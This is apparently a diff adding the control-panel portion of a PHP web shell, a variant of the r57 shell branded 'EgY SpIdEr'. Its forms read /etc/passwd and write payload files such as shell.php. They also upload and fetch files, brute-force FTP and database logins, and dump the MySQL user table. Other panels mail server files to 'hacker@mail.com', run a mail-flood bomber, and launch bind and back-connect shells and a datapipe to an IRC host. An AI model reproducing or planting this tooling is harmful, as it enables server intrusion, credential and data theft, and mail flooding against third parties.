+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text170'],'id2221').$table_up2.div('id2221').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','egy_4_2_0',96,(!empty($_POST['egy_4_2_0'])?($_POST['egy_4_2_0']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_4_2_0').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].ws(2).$lang[$language.'_text60'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test_global'])?($_POST['test_global']):($dir))).in('hidden','cmd',0,'safe_dir').in('hidden','glob',0,'glob').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+$select_n_rlph = "<select name='n_rlph'><option value=1>[ 1 ] (<<0,01 sec)</option><option value=2>[ 2 ] (<0,01 sec)</option>".
+"<option value=3 selected>[ 3 ] (<1 sec (default))</option>".
+"<option value=4>[ 4 ] (<10 sec)</option><option value=5>[ 5 ] (>100 sec (danger))</option><option value=6>[ 6 ] (>>100 sec (danger))</option></select>";
+echo $fs.$table_up1.div_title($lang[$language.'_text145'],'id41').$table_up2.div('id41').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',30,(!empty($_POST['dir_rlph'])?($_POST['dir_rlph']):($dir))).ws(2).'<b>'.$lang[$language.'_text55'].'</b>'.ws(2).in('text','end_rlph',6,(!empty($_POST['end_rlph'])?($_POST['end_rlph']):('.php'))).ws(2).in('hidden','cmd',0,'safe_dir').ws(2).'<b>'.$lang[$language.'_text146'].'</b>'.ws(2).$select_n_rlph.ws(2).in('hidden','realpath',0,'realpath').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):($tempdir.'test.zip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):($tempdir.'test.bzip'))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up3.div('id27').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text133'],'id39').$table_up2.div('id39').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test18_file2',96,(!empty($_POST['test18_file2'])?($_POST['test18_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test18'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test18_file1',96,(!empty($_POST['test18_file1'])?($_POST['test18_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
+echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
+echo "<tr><td valign=top width=70%>".$ts;
+echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
+echo $te."</td><td valign=top width=30%>".$ts;
+echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1;
+}
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
+echo "<tr><td valign=top width=70%>".$ts;
+echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
+echo $te."</td><td valign=top width=30%>".$ts;
+echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1;
+}
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text171'],'id98200').$table_up2.div('id98200').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('hidden','dir',0,$dir).in('hidden','cmd',0,'egy_5_2_3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+
+
+
+
+{
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
+echo "<tr><td valign=top width=50%>".$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
+echo $te."</td><td valign=top width=50%>".$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
+echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td></tr>";
+echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+
+
+{
+ echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
+ echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>",$select_downloaders.in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+ echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir.'/download.file').ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+ echo $te.'</div>'.$table_end1.$fe;
+}
+
+
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip'; }
+if(@function_exists('gzencode')) { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+
+
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
+echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
+echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
+echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt1']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',20,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',20,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',20,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',20,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option value=FTP_BINARY>FTP_BINARY</option><option value=FTP_ASCII>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text102'],'id35').$table_up2.div('id35').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("file from egy spider shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',30,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text139']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',30,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_bomber').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',30,(!empty($_POST['from'])?($_POST['from']):("egy_spider@hotmail.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',30,(!empty($_POST['subj'])?($_POST['subj']):("hello EgY SpIdEr"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=22 rows=1>'.(!empty($_POST['text'])?($_POST['text']):("flood text here")).'</textarea>');
+echo sr(25,"<b>Flood".$arrow."</b>",in('int','mail_flood',5,(!empty($_POST['mail_flood'])?($_POST['mail_flood']):100)).ws(4)."<b>Size(kb)".$arrow."</b>".in('int','mail_size',5,(!empty($_POST['mail_size'])?($_POST['mail_size']):10)));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+
+
+echo $te."</td>".$fe."</tr></div></table>";
+}
+
+
+
+
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option value=MySQL>MySQL</option>';
+if($mssql_on) $select .= '<option value=MSSQL>MSSQL</option>';
+if($pg_on) $select .= '<option value=PostgreSQL>PostgreSQL</option>';
+if($ora_on) $select .= '<option value=Oracle>Oracle</option>';
+if($mysqli_on) $select .= '<option value=MySQLi>MySQLi</option>';
+if($msql_on) $select .= '<option value=mSQL>mSQL</option>';
+if($sqlite_on) $select .= '<option value=SQLite>SQLite</option>';
+$select .= '</select>';
+
+
+echo $table_up1.div_title($lang[$language.'_text82'],'id36').$table_up3.div('id36').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text134']."</div></b></font>";
+
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select.in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_brute'));
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href='".$_SERVER['PHP_SELF']."?users'>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
+echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
+echo sr(35,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))));
+echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'passw.dic'))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt1']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',8,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',17,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+
+
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+
+
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',8,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',8,(!empty($_POST['db_port'])?($_POST['db_port']):(""))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',8,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',8,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',8,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=30 rows=4 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSHOW TABLES;\nSELECT * FROM user;\nSELECT version();\nSELECT user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div>";
+
+
+echo "</td>".$fe."</tr></div></table>";
+}
+
+
+
+
+{
+echo $table_up1.div_title($lang[$language.'_text81'],'id555555').$table_up2.div('id555555').$ts."<tr>".$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',10,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',10,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',10,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',10,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',10,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe.$fs."<td valign=top width=25%>".$ts;
+echo "<font face=Verdana size=-2><b><div align=center id='n'>Proxy</div></b></font>";
